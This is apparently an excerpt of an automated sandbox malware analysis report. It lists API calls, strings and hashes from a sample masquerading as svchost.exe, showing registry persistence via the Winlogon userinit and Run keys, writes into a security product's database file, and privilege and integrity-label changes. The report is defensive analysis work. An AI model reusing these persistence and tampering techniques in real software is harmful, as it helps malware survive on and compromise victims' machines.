                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                • API String ID: 606440919-2829233815
                                                                                                                                                                                                                • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                                • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                                Function 02BB3300 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 80registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB3325
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BB3344
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BB3351
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02BB336E
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB3389
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02BB33A7
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02BB33DE
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02BB33FC
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 02BB340A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SystemDrive, xrefs: 02BB333F
                                                                                                                                                                                                                • userinit, xrefs: 02BB33F6
                                                                                                                                                                                                                • software\microsoft\windows\currentversion\run, xrefs: 02BB33D4
                                                                                                                                                                                                                • C:\Windows\apppatch\svchost.exe, xrefs: 02BB33B4, 02BB33EB
                                                                                                                                                                                                                • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02BB339D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 3780845138-4271125494
                                                                                                                                                                                                                • Opcode ID: 1146f43d57696100eead7d7928bd35a1d992f06279c3760900a734b05e9a1650
                                                                                                                                                                                                                • Instruction ID: 513e0c634cbdad5360db91fa4aefcad941860d62ea0146aff4c01a43713d611d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1146f43d57696100eead7d7928bd35a1d992f06279c3760900a734b05e9a1650
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D21F975A80308FBFB24DB90CC8AFEEB778EB44B44F904588B705A6180D7F16658CB65
                                                                                                                                                                                                                Function 02BB74A0 Relevance: 24.1, APIs: 16, Instructions: 142memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,7556F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB75A8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB75AF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB75CF
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB75E0
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 02BB75F0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2214028410-0
                                                                                                                                                                                                                • Opcode ID: ff7d09f1c406c82f4812dfae6d1d18174498ab6f0bf456797ae3c7ec2d930700
                                                                                                                                                                                                                • Instruction ID: f05557522342c282cabe9d1606515fad29341b953299d1aa206b0e5b30a41fe4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff7d09f1c406c82f4812dfae6d1d18174498ab6f0bf456797ae3c7ec2d930700
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A41B072A40304BBEB319FB59C49FAFBBACEF84751F508654FA05A7181DBB49510CBA0
                                                                                                                                                                                                                Function 02BB7350 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 125fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,7556F380,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02BB738D
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BB73B4
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?), ref: 02BB73D5
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BB73EE
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BB73F8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000), ref: 02BB740C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB741B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB742D
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB743D
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000), ref: 02BB744A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB746C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB747D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: 75e07169306e0444344d7d550945dcedee181debbb28766800361b3626da3fd7
                                                                                                                                                                                                                • Instruction ID: 396ef81e0774c3c0baa0333d3cdfe3a58da3b7d03874aff2f0b23c168e2ee6cc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75e07169306e0444344d7d550945dcedee181debbb28766800361b3626da3fd7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2419336A80208BBE7218F64DC89FEEBB6CEF84755F548155FE04DB1C0DBB0955187A0
                                                                                                                                                                                                                Function 00402930 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                                • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                                • userinit, xrefs: 00402A38
                                                                                                                                                                                                                • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                                • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 3547530944-2324515132
                                                                                                                                                                                                                • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                                • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                                Function 00401CF0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                                • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                                Function 02BD5680 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD56A6
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,75570F00), ref: 02BD56B7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD56C0
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 02BD56CF
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56D8
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD56F8
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD5709
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 02BD572A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 02BD574C
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 02BD5758
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 02BD5766
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                • Opcode ID: 39a02fd67461b59944fc2777e90484ca92c6c71321e5749596828a8c1181faa0
                                                                                                                                                                                                                • Instruction ID: f3bfd1e9bc7a1451e5ffc3dee36508268ad7b8ab5e19761d113258a3d9e04498
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39a02fd67461b59944fc2777e90484ca92c6c71321e5749596828a8c1181faa0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21AB36941114ABD7709BA8AC48FDE77BCEB45364F9402D5EA05D3180FB30DE5587A0
                                                                                                                                                                                                                Function 02BB7728 Relevance: 19.6, APIs: 13, Instructions: 140memorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02BB77DE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB77E5
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB77F9
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,02BD45C4,00000104), ref: 02BB7808
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(00000000), ref: 02BB780F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7883
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB7886
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7893
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB7896
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocBackslashFreePathValidatelstrcpynmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 296989886-0
                                                                                                                                                                                                                • Opcode ID: 4fbc467d81ee560b850daa2d33b39a47930cc2f110f47b41f75d080dee2e304f
                                                                                                                                                                                                                • Instruction ID: 109e7a78faf36f647976f5819db03581173ce44ef76ab8a4ab3416684d5f8ac1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fbc467d81ee560b850daa2d33b39a47930cc2f110f47b41f75d080dee2e304f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A41D4739082465BCB228B319C99BF7BFAAEFC5344F4845D4EAC287141EF62E409D790
                                                                                                                                                                                                                Function 02BB6C70 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,9E9388F8a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                • String ID: 9E9388F8a$software\microsoft
                                                                                                                                                                                                                • API String ID: 217510255-1862788399
                                                                                                                                                                                                                • Opcode ID: 9b44c21adba570f0f78005d9a91c3b28b9bb01c324cf47cc8e37b16869673f8d
                                                                                                                                                                                                                • Instruction ID: 3c7f919c13970d223deefaf38efdb687625a569ec523427cd7b716c3292c661e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b44c21adba570f0f78005d9a91c3b28b9bb01c324cf47cc8e37b16869673f8d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A319671E412286AEB26DB659C49BEE7B7CEF04704F4005D9EA49E7140D7F05E848BE1
                                                                                                                                                                                                                Function 02BB6B10 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6B41
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6B5F
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02BB6B7A
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(80000001,9E9388F8a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6BA1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6C1A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6C21
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB6C35
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6C4E
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02BB6C5C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                • String ID: 9E9388F8a$software\microsoft
                                                                                                                                                                                                                • API String ID: 217510255-1862788399
                                                                                                                                                                                                                • Opcode ID: 13b713a950e6957190f99bcf5d654bc9325bf44c57b760965c84fee10d47e055
                                                                                                                                                                                                                • Instruction ID: 1901724a7288bbe702ed13dbb7a547ebc370532850a48d1f11987cf042e34688
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13b713a950e6957190f99bcf5d654bc9325bf44c57b760965c84fee10d47e055
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B31C671D412586AEB25DB64CC4ABEF7B7CEF04705F4045D8E749E7180E7F09A888BA0
                                                                                                                                                                                                                Function 02BD4880 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                Download Yara Rule
